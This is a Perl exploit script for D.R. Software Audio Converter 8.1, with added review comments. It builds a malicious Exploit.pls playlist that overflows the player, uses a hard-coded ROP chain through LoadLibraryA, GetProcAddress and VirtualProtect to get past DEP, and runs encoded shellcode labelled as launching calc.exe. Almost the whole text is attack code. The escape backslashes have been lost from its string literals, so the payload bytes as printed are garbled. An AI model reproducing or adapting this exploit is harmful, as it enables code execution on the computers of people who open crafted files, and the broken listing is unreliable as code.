#!/usr/bin/perl
#
#[+]Exploit Title: D.R. Software Audio Converter 8.1 DEP Bypass Exploit
#[+]Date: 13 82011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
#[+]Found By: Sud0 from Corelan Team(http://www.exploit-db.com/exploits/13760/) or also created KedAns-Dz(http://1337day.com/exploits/16248)
#[+]Version: 8.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
# Review notes (documentation pass only; no code has been changed):
#  - Purpose: writes one 30000-byte playlist file, Exploit.pls, built from a
#    fixed layout of filler runs ("A", "C", "D"), little-endian 32-bit values
#    from pack('V', ...), and two string constants ($rop, $shellcode).  That
#    file is the untrusted input handed to the affected player; an oversized
#    .pls made mostly of a single repeated character is the observable
#    artefact on disk.
#  - Every pack('V', ...) value is a hard-coded address in two fixed image
#    ranges (0x004xxxxx and 0x10xxxxxx) for the build named in the header
#    (WIN-XP SP3, Brazilian Portuguese).  A build or OS that relocates those
#    images would not match these constants.
#  - As printed, the escape sequences inside the string literals have lost
#    their backslashes (e.g. "x90", "kernel32.dllx00"); the listing is
#    reproduced exactly as printed and nothing has been restored.
#  - Perl hygiene (noted, not fixed): no `use strict; use warnings;`, a
#    2-arg open() on the bareword filehandle f, and an unchecked close().
#  - Comments that were in Portuguese are translated to English below.
#
print q{ Created By C4SS!0 G0M3S E-mail louredo_@hotmail.com Site net-fuzzer.blogspot.com };
print " [+]Creating Exploit File... ";
sleep(2);

# Chain, part 1.  Each line appends one 4-byte little-endian value; the
# trailing comment is the author's label for that address.
#####################################ROP FOR LoadLibraryA##############################
my $rop = pack('V',0x00430076); # POP ECX # RETN
$rop .= pack('V',0x0044B274); # Address of LoadLibraryA
$rop .= pack('V',0x1003d56e); # POP ESI # RETN
$rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to LoadLibraryA
$rop .= pack('V',0x10068022); # POP EBP # RETN
$rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04
$rop .= pack('V',0x0040aaf2); # POP EDI # RETN
$rop .= pack('V',0x1002ef15); #RETN
$rop .= pack('V',0x1002ef14); # PUSHAD # RETN
$rop .= "kernel32.dllx00";   # literal as printed; no escape has been restored
$rop .= "A" x 11;
#####################################ROP END HERE#######################################

# Chain, part 2.
#####################################ROP FOR GetProcAddress#############################
$rop .= pack('V',0x1002ef15) x 3; #RETN
$rop .= pack('V',0x00430076); # POP ECX # RETN
$rop .= pack('V',0x0044B1E8); # Address of GetProcAddress
$rop .= pack('V',0x0040aaf2); # POP EDI # RETN
$rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to GetProcAddress
$rop .= pack('V',0x1006809f); # POP ESI # RETN
$rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04
$rop .= pack('V',0x00447b7d); # XCHG EAX,EBP # RETN
$rop .= pack('V',0x1002ef14); # PUSHAD # RETN
$rop .= "VirtualProtectx00"; # literal as printed; no escape has been restored
$rop .= "D" x 9; # Junk
#####################################ROP END HERE#######################################

# Chain, part 3.
################################ROP FOR VirtualProtect##################################
$rop .= pack('V',0x1002ef15) x 4; #RETN
$rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN
$rop .= pack('V',0x100753c0); # PUSH ESP # POP EBP # POP EBX # ADD ESP,10 # RETN
$rop .= "A" x 20; # Junk
$rop .= pack('V',0x10015a15); # XCHG EAX,EBP # RETN
$rop .= pack('V',0x1004108e) x 20; # ADD EAX,0A # RETN
$rop .= pack('V',0x1007275D); # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
$rop .= "A" x 4;
$rop .= pack('V',0x1002ef15) x 5; #RETN
$rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN
$rop .= pack('V',0x10068022); # POP EBP # RETN
$rop .= pack('V',0x0040A8F4); # CALL ESP // return address for the function
$rop .= pack('V',0x100080ea); # POP EBX # RETN
$rop .= pack('V',0x00001000); # dwSize value
$rop .= pack('V',0x10082cde); # POP EDX # RETN
$rop .= pack('V',0x00000040); # flNewProtect value
$rop .= pack('V',0x1007076e); # POP EDI # RETN
$rop .= pack('V',0x1002ef15); # RETN
$rop .= pack('V',0x1002ef14); # PUSHAD # RETN
$rop .= "x90" x 25; # Some nops  (literal three-character string as printed)
$rop .= "xebx10"; # Little jmp to fix shellcode. :)
$rop .= "x90" x 20; # More nops
####################################ROP END HERE#####################################

# Payload string, reproduced as printed (backslashes absent in this listing,
# so each "xNN" is three literal characters rather than one byte).
my $shellcode = "xb8x4bxafx2dx0exdaxdexd9x74x24xf4x5bx29xc9" .
"xb1x32x83xebxfcx31x43x0ex03x08xa1xcfxfbx72" .
"x55x86x04x8axa6xf9x8dx6fx97x2bxe9xe4x8axfb" .
"x79xa8x26x77x2fx58xbcxf5xf8x6fx75xb3xdex5e" .
"x86x75xdfx0cx44x17xa3x4ex99xf7x9ax81xecxf6" .
"xdbxffx1fxaaxb4x74x8dx5bxb0xc8x0ex5dx16x47" .
"x2ex25x13x97xdbx9fx1axc7x74xabx55xffxffxf3" .
"x45xfex2cxe0xbax49x58xd3x49x48x88x2dxb1x7b" . # Shellcode Winexec "Calc.exe"
"xf4xe2x8cxb4xf9xfbxc9x72xe2x89x21x81x9fx89" . # Bad chars "x00x20x3dx0ax0dxff"
"xf1xf8x7bx1fxe4x5ax0fx87xccx5bxdcx5ex86x57" .
"xa9x15xc0x7bx2cxf9x7ax87xa5xfcxacx0exfdxda" .
"x68x4bxa5x43x28x31x08x7bx2ax9dxf5xd9x20x0f" .
"xe1x58x6bx45xf4xe9x11x20xf6xf1x19x02x9fxc0" .
"x92xcdxd8xdcx70xaax17x97xd9x9axbfx7ex88x9f" .
"xddx80x66xe3xdbx02x83x9bx1fx1axe6x9ex64x9c" .
"x1axd2xf5x49x1dx41xf5x5bx7ex04x65x07x81";

# File body: 180-byte prefix, a few fixed addresses, filler padded to the
# absolute offset 4436, another address, 124 bytes of filler, then $rop,
# $shellcode, and "D" padding up to exactly 30000 bytes.  The two
# "(N - length($buf))" terms are what pin the later parts to fixed offsets.
my $buf = "A" x 180;
$buf .= pack('V',0x1001bc95); # ADD ESP,1010 # RETN 04
$buf .= "A" x 4112;
$buf .= pack('V',0x10071916) x 2; # RETN
$buf .= pack('V',0x10071910); # ADD ESP,100 # RETN
$buf .= "C" x (4436-length($buf));
$buf .= pack('V',0x10029cfd); # ADD ESP,814 # RETN
$buf .= "A" x 124;
$buf .= $rop;
$buf .= $shellcode;
$buf .= "D" x (30000-length($buf));

# Output: 2-arg open on a bareword handle (see review notes); only the open
# is error-checked, the print and close are not.
open(f,">Exploit.pls") or die "[*]Error: $! ";
print f $buf;
close f;
print " [+]File Exploit.pls Created successfully. ";
sleep(1);
